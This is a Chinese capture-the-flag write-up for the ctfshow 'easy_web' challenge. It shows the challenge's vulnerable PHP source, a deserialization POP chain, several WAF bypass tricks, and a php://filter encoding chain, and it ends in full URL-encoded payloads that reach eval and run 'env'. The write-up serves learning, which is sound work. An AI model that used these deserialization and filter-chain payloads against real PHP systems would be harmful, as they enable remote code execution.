ctfshow元旦水友赛 easy_web(进一步解释)

前言

刷题时看到有大佬已经有wp了，但其中有些东西并不能让我很好的理解，特写一篇文章来补全一下
大佬wp
#预期解法

源码

开胃小菜，就让我成为签到题叭 <?php
header('Content-Type:text/html;charset=utf-8');
error_reporting(0);


function waf1($Chu0){
    foreach ($Chu0 as $name => $value) {
        if(preg_match('/[a-z]/i', $value)){
            exit("waf1");
        }
    }
}

function waf2($Chu0){
    if(preg_match('/show/i', $Chu0))
        exit("waf2");
}

function waf_in_waf_php($a){
    $count = substr_count($a,'base64');
    echo "hinthinthint,base64喔"."<br>";
    if($count!=1){
        return True;
    }
    if (preg_match('/ucs-2|phar|data|input|zip|flag|\%/i',$a)){
        return True;
    }else{
        return false;
    }
}

class ctf{
    public $h1;
    public $h2;

    public function __wakeup(){
        throw new Exception("fastfast");
    }

    public function __destruct()
    {
        $this->h1->nonono($this->h2);
    }
}

class show{

    public function __call($name,$args){
        if(preg_match('/ctf/i',$args[0][0][2])){
            echo "gogogo";
        }
    }
}

class Chu0_write{
    public $chu0;
    public $chu1;
    public $cmd;
    public function __construct(){
        $this->chu0 = 'xiuxiuxiu';
    }

    public function __toString(){
        echo "__toString"."<br>";
        if ($this->chu0===$this->chu1){
            $content='ctfshowshowshowwww'.$_GET['chu0'];
            if (!waf_in_waf_php($_GET['name'])){
                file_put_contents($_GET['name'].".txt",$content);
            }else{
                echo "绕一下吧孩子";
            }
                $tmp = file_get_contents('ctfw.txt');
                echo $tmp."<br>";
                if (!preg_match("/f|l|a|g|x|\*|\?|\[|\]| |\'|\<|\>|\%/i",$_GET['cmd'])){
                    eval($tmp($_GET['cmd']));
                }else{
                    echo "waf!";
                }

            file_put_contents("ctfw.txt","");
        }
        return "Go on";
        }
}


if (!$_GET['show_show.show']){
    echo "开胃小菜，就让我成为签到题叭";
    highlight_file(__FILE__);
}else{
    echo "WAF,启动！";
    waf1($_REQUEST);
    waf2($_SERVER['QUERY_STRING']);
    if (!preg_match('/^[Oa]:[\d]/i',$_GET['show_show.show'])){
        unserialize($_GET['show_show.show']);
    }else{
        echo "被waf啦";
    }

}

流程

waf1()->waf2()->正则->ctf() __destruct -> show() __call -> Chu0_write __toString(){waf_in_waf_php()}

构建pop链

<?php
 
class ctf{
    public $h1;
    public $h2;
 
}
 
class show{
 
}
 
class Chu0_write{
    public $chu0;
    public $chu1;
    public $cmd;
}
 
$a=new ctf();
$a->h1=new show();
$a->h2=[[2=>new Chu0_write()]];  //注意这里的参数是ctf()的h2
                                 //__call($name,$args)中的$args已经是一个数组,所h2只用嵌套两层即可
 
echo serialize($a);

得到pop链

O:3:"ctf":2:{s:2:"h1";O:4:"show":0:{}s:2:"h2";a:1:{i:0;a:1:{i:2;O:10:"Chu0_write":3:{s:4:"chu0";N;s:4:"chu1";N;s:3:"cmd";N;}}}}

要绕过其正则

preg_match('/^[Oa]:[\d]/i',$_GET['show_show.show']

则最终pop链为

O:+3:"ctf":2:{s:2:"h1";O:4:"show":0:{}s:2:"h2";a:1:{i:0;a:1:{i:2;O:10:"Chu0_write":3:{s:4:"chu0";N;s:4:"chu1";N;s:3:"cmd";N;}}}}

waf1就是我们传递的参数值中不能含有a-z和A-Z，这里有个知识点，就是$_REQUEST的传参中POST的优先级比GET高，我们可以POST复制传递题目让我们GET的参数，waf1就会匹配POST的数据而忽略GET，从而绕过

waf2让我们GET传参中不能有show出现，可以用URL加密进行绕过，在传参规则中show_show.shwo不能允许所以改成show[show.show

所以传参
GET：?%73%68%6f%77%5b%73%68%6f%77%2e%73%68%6f%77=%4f:%2b%33:%22%63%74%66%22:%32:%7b%73:%32:%22%68%31%22%3b%4f:%34:%22%73%68%6f%77%22:%30:%7b%7d%73:%32:%22%68%32%22%3b%61:%31:%7b%69:%30%3b%61:%31:%7b%69:%32%3b%4f:%31%30:%22%43%68%75%30%5f%77%72%69%74%65%22:%33:%7b%73:%34:%22%63%68%75%30%22%3b%4e%3b%73:%34:%22%63%68%75%31%22%3b%4e%3b%73:%33:%22%63%6d%64%22%3b%4e%3b%7d%7d%7d

POST：show[show.show=1
这样到了tostring下面
这里主要是用了php://filter的具体的思路还是看大佬的wp
主要修改一下其加密的方式

<?php
 $text = "system";
 $base64_text = base64_encode($text);
 $myarray = str_split($base64_text, 1);
 $s=implode("\x00", $myarray)."\x00";//为了不造成传参中出现两个=,对其前后都加上/x00,且并不会对之后的base64解码造成影响
 $quoted_printable = quoted_printable_encode($s);
 echo $quoted_printable;
?>

所以最终payload
GET：?%73%68%6f%77[%73%68%6f%77.%73%68%6f%77=%43%3a%31%31%3a%22%41%72%72%61%79%4f%62%6a%65%63%74%22%3a%31%36%34%3a%7b%78%3a%69%3a%30%3b%61%3a%31%3a%7b%73%3a%39%3a%22%67%78%6e%67%78%6e%67%78%6e%22%3b%4f%3a%33%3a%22%63%74%66%22%3a%32%3a%7b%73%3a%32%3a%22%68%31%22%3b%4f%3a%34%3a%22%73%68%6f%77%22%3a%30%3a%7b%7d%73%3a%32%3a%22%68%32%22%3b%61%3a%31%3a%7b%69%3a%30%3b%61%3a%31%3a%7b%69%3a%32%3b%4f%3a%31%30%3a%22%43%68%75%30%5f%77%72%69%74%65%22%3a%33%3a%7b%73%3a%34%3a%22%63%68%75%30%22%3b%4e%3b%73%3a%34%3a%22%63%68%75%31%22%3b%4e%3b%73%3a%33%3a%22%63%6d%64%22%3b%4e%3b%7d%7d%7d%7d%7d%3b%6d%3a%61%3a%30%3a%7b%7d%7d&name=php://filter/convert.quoted-printable-decode/convert.iconv.utf-16.utf-8/convert.base64-decode/resource=ctfw&chu0=c=003=00l=00z=00d=00G=00V=00t=00&cmd=env

POST：show[show.show=1&name=1&chu0=1&cmd=1

后言

这篇博客是看了大佬的wp后进行的进一步解释，所以会有很多相同之处。如有侵犯请联系我（立马删除）最后再次推荐一下大佬的wp